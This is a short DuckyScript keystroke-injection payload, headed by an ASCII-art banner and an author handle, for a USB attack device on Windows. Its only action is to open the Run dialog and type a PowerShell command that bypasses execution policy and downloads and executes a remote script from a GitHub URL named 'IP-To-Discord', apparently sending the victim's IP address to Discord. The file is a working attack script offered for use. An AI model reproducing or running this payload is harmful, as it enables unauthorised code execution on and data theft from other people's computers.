REM ################################################################################
REM #                                                                              #
REM #                                                                              #
REM #                     _..-'(                       )`-.._                      #
REM #                  ./'. '||\\.       (\_/)       .//||` .`\.                   #
REM #               ./'.|'.'||||\\|..    )0 0(    ..|//||||`.`|.`\.                #
REM #            ./'..|'.|| |||||\`````` '`"'` ''''''/||||| ||.`|..`\.             #
REM #          ./'.||'.|||| ||||||||||||.     .|||||||||||| |||||.`||.`\.          #
REM #         /'|||'.|||||| ||||||||||||{     }|||||||||||| ||||||.`|||`\          #
REM #        '.|||'.||||||| ||||||||||||{     }|||||||||||| |||||||.`|||.`         #
REM #       '.||| ||||||||| |/'   ``\||``     ''||/''   `\| ||||||||| |||.`        #
REM #       |/' \./'     `\./         \!|\   /|!/         \./'     `\./ `\|        #
REM #       V    V         V          }' `\ /' `{          V         V    V        #
REM #       `    `         `               V               '         '    '        #
REM #                                                                              #
REM #                       __ _   __  ____    ____  _  _  ____                    #
REM #                      (  ( \ /  \(_  _)  (    \( \/ )(__  )                   #
REM #                      /    /(  O ) )(  _  ) D ( )  /  / _/                    #
REM #                      \_)__) \__/ (__)(_)(____/(__/  (____)                   #
REM ################################################################################
REM # Disc: Not.dyz#4927                                                           #
REM # Git: dyl4nz                                                                  #
REM #################################################################################################################################
REM #                                                                                                                               #
REM #       _         _                        _             __            _       _ _       __                                     #
REM #      /_\  _   _| |_ ___  _ __ ___   __ _| |_ ___      /__\_  ___ __ | | ___ (_) |_    / _\ ___  ___ _   _ _ __ ___            #
REM #     //_\\| | | | __/ _ \| '_ ` _ \ / _` | __/ _ \    /_\ \ \/ / '_ \| |/ _ \| | __|   \ \ / _ \/ __| | | | '__/ _ \           #
REM #    /  _  \ |_| | || (_) | | | | | | (_| | ||  __/_  //__  >  <| |_) | | (_) | | |_ _  _\ \  __/ (__| |_| | | |  __/_          #
REM #    \_/ \_/\__,_|\__\___/|_| |_| |_|\__,_|\__\___(_) \__/ /_/\_\ .__/|_|\___/|_|\__(_) \__/\___|\___|\__,_|_|  \___(_)         #
REM #                                                               |_|                                                             #
REM #                                                                                                                               #
REM #################################################################################################################################

DELAY 200
GUI r
DELAY 50
ALTSTRING powershell -ExecutionPolicy Bypass -Command "& {Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/dyl4nz/powershell/main/IP-To-Discord/IP.ps1'))}"
ENTER
